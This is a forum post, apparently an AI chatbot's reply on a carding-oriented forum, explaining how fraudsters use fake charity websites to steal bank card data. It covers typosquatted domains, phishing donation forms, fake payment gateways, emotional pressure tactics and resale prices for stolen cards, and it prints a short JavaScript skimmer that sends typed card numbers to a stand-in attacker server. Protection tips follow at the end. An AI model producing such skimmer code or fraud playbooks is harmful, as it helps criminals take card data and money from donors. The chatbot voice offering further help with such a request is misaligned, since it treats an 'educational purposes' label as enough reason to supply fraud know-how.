How do carders use fake charity websites to collect card data?

Student

Professional
Messages
588
Reaction score
253
Points
63
For educational purposes, I'll detail how carders use fake charity websites to steal bank card data, including technical aspects, psychological manipulation, and security measures. I'll also explain how these schemes work in practice and provide examples based on typical fraud methods. If you need more information, such as case studies or link verification, please let me know!

How carders use fake charity websites​

Carders are cybercriminals who specialize in stealing bank card data (card number, cardholder name, expiration date, CVV code) and using it for fraudulent transactions, such as unauthorized purchases, transfers, or selling data on the dark web. Fake charity websites are a popular tool in their arsenal, exploiting people's trust in charity and emotional involvement. Here's a detailed breakdown of their methods:

1. Creating fake websites​

Carders create websites that appear to be legitimate charities. To do this, they:
  • Copying design and branding: They use logos, fonts, colors, and styles of well-known foundations (e.g., the Red Cross, UNICEF, or local charities). They may copy the entire design from the official website to minimize suspicion.
  • Registering similar domains: Fraudsters purchase domain names that differ from the original in minor details (for example, charityfund.org → charity-fund.org, which uses the letter "a" instead of "a"). This is called typosquatting. Sometimes they use subdomains (for example, unicef.donatenow.ru) or domains in lesser-known extensions (.co, .info instead of .org).
  • Hosting and anonymity: Websites are hosted on cheap hosting services, often in jurisdictions with low levels of regulation. Carders use VPNs, proxies, or anonymous domain registrars to hide their identities.

Example: After an earthquake or other natural disaster, a website called "help-quakevictims.org" appears to be an official relief fund, but is actually a scam.

2. Phishing forms and data collection​

The main method of data theft is phishing forms posted on the website:
  • Donation form: Users are asked to enter card details (16-digit number, name, expiration date, CVV) under the guise of making a donation. Sometimes additional information is requested, such as address, email, and phone number, which increases the value of the stolen information for scammers.
  • Fake payment gateways: Instead of redirecting to secure payment systems (e.g., PayPal, Stripe), the website mimics the interface of such gateways. The user thinks they are entering data on a secure platform, but it is actually sent directly to carders.
  • Data storage: The entered data is stored in the scammers' database or immediately transmitted via encrypted channels (for example, via Telegram or darknet servers).

Technical aspect: Forms often use simple HTML/CSS pages with JavaScript to process input. In more complex cases, skimmers are used —scripts that automatically collect data entered into form fields and send it to a remote server. For example, a skimmer can be embedded in the page code and silently intercept data even if the user doesn't click "Submit."

3. Psychological manipulation​

Carders actively use psychological tricks to make users trust the site and act quickly:
  • Emotional trigger: Websites often exploit urgent or tragic events (e.g., "Help children with rare diseases!" or "Urgent aid for flood victims"). Stories are accompanied by emotional images (sick children, destroyed homes) to evoke empathy.
  • Creating urgency: Countdown timers ("24 hours left to help!") or messages like "Every minute counts!" encourage victims to act impulsively without checking the site.
  • Social Proof: Fake reviews, fake donation counters ("$10,000 already raised!"), or celebrity endorsements create the illusion of legitimacy.
  • False Transparency: Sites may contain fake "About Us," "Contact Us" sections, or even fake certificates to appear legitimate.

Example: A site might claim to be raising money for hurricane victims by displaying fake photos and videos, as well as fake "gratitude" stories from those supposedly receiving aid.

4. Promotion of fake websites​

To attract victims, carders use various promotion channels:
  • Search Engine Optimization (SEO): Fraudsters optimize websites for search engines to rank high for queries like "help disaster victims." Sometimes they use black hat SEO techniques such as keyword stuffing or link buying.
  • Contextual advertising: Fake websites are advertised through Google Ads or other platforms, where scammers use keywords related to charity. The ads may appear legitimate.
  • Social media and messaging apps: Carders send links to fake websites via email, Telegram, WhatsApp, or social media posts, often disguising them as official accounts. For example, they might create a fake foundation account on X and post appeals for donations.
  • Phishing emails: Mailings with emotional headlines ("Urgent! Children need your help!") contain links to fake websites.

Example: After a major fire, a Google ad appears in the news with the text "Help fire victims now!" and a link to a phishing site.

5. Use of skimmers and malware​

More advanced carders introduce additional data-stealing tools to websites:
  • Web skimmers: These are JavaScript codes that intercept data entered into forms and send it to the scammers' server. Skimmers can be embedded in the page's code or introduced through server vulnerabilities (for example, through CMS plugins like WordPress).
  • Malware: A fake website can infect a user's device if they download a file (for example, a "donation report") or click a malicious link. This malware can collect data not only from the website but also from the device (logins, passwords, autofill data).
  • Traffic hijacking: In rare cases, scammers use techniques like DNS spoofing to redirect users from legitimate sites to fake ones.

Technical aspect: Skimmers often disguise themselves as legitimate scripts (e.g., analytics or support chat). The code can be obfuscated to make it more difficult for antivirus software to detect. An example of a simple skimmer:

JavaScript:
document.getElementById('card-number').addEventListener('input', function() {
fetch('http://malicious-server.com/steal', {
method: 'POST',
body: JSON.stringify({ card: this.value })
});
});

This code sends the entered card number to the scammers' server in real time.

6. Use and monetization of stolen data​

Once the data is collected, carders use it in several ways:
  • Direct fraud: Card data is used for purchases in online stores, cash withdrawals, or transfers to controlled accounts.
  • Darknet sales: Stolen data is sold on darknet forums or marketplaces (e.g. $5–$50 for a full set of card data, depending on the region and card type).
  • Cardsharing: Carders can use the data to test on small transactions to check if a card is active before selling it.
  • Combination attacks: If additional data (email, phone number) is collected, carders can use it for phishing, social engineering or blackmail.

Example: A carder buys card data for $10 on the dark web, uses it to buy $1,000 worth of electronics, and then resells the goods for cash.

Real-life examples and the scale of the problem​

While I don't have access to specific incidents after 2023, typical cases include:
  • Following the 2023 earthquakes in Turkey and Syria, numerous fake websites soliciting "donations" for victims were identified. They used the names of well-known organizations and collected card details through phishing forms.
  • During the COVID-19 pandemic, scammers created websites to "raise funds for vaccines" or "help hospitals," exploiting fear and the desire to help.
  • According to cybersecurity companies such as Kaspersky, phishing attacks using charity websites increase by 20–30% during major crises.

If you'd like, I can search for current examples or analyze a specific site/post in X to check it for signs of scams.

How to protect yourself: recommendations for users​

To avoid falling victim to fake charity websites, follow these steps:
  1. Check the website URL:
    • Make sure the domain accurately matches the organization's official website. For example, "redcross.org" is legitimate, while "red-cross-help.org" is suspicious.
    • Look for HTTPS (the padlock in your browser), but remember that scammers can also use SSL certificates.
  2. Use proven payment systems:
    • Legitimate organizations redirect to well-known gateways (PayPal, Stripe, Yandex.Checkout). If a site asks you to enter your card details directly, that's a red flag.
  3. Check the organization:
    • Look for information about the foundation on official websites, in NPO registries, or through online reviews.
    • Please contact the organization directly through official contacts to confirm your fundraising.
  4. Beware of emotional manipulation:
    • If a site is pushing urgency or using overly emotional stories, double-check it.
  5. Use protection on your device:
    • Install antivirus software and browser extensions (such as uBlock Origin) that block malicious scripts.
    • Do not download files from suspicious websites.
  6. Monitor your accounts:
    • Turn on transaction notifications in your banking app.
    • If your card details are compromised, block the card immediately and notify the bank.
  7. Donations through trusted platforms:
    • Use platforms like GoFundMe, JustGiving, or local equivalents that vet fundraisers.

Technical measures for developers and organizations​

Charities and website developers can reduce the risks associated with fake websites by:
  • Domain Monitoring: Register similar domain names to prevent typosquatting.
  • Skimmer protection: Regularly scan your website code for malicious scripts. Use tools like Magecart Scanner.
  • User education: Post fraud warnings on official websites and social media.
  • Secure Payments: Integrate only trusted payment gateways and avoid direct card entry on your website.

Conclusion​

Fake charity websites are an effective tool for carders, as they combine technical tricks (phishing, skimmers) and psychological manipulation. Fraudsters exploit trust and a desire to help, especially during times of crisis. Understanding their methods and following basic security measures (URL verification, using secure gateways, transaction monitoring) significantly reduces the risk of becoming a victim.

If you need an analysis of a specific website, a post on X, or additional information (such as relevant examples from web searches), let me know, and I'll conduct an in-depth analysis! I can also provide visualizations, such as a diagram of how a phishing site works, if this would be useful for educational purposes.
 
Top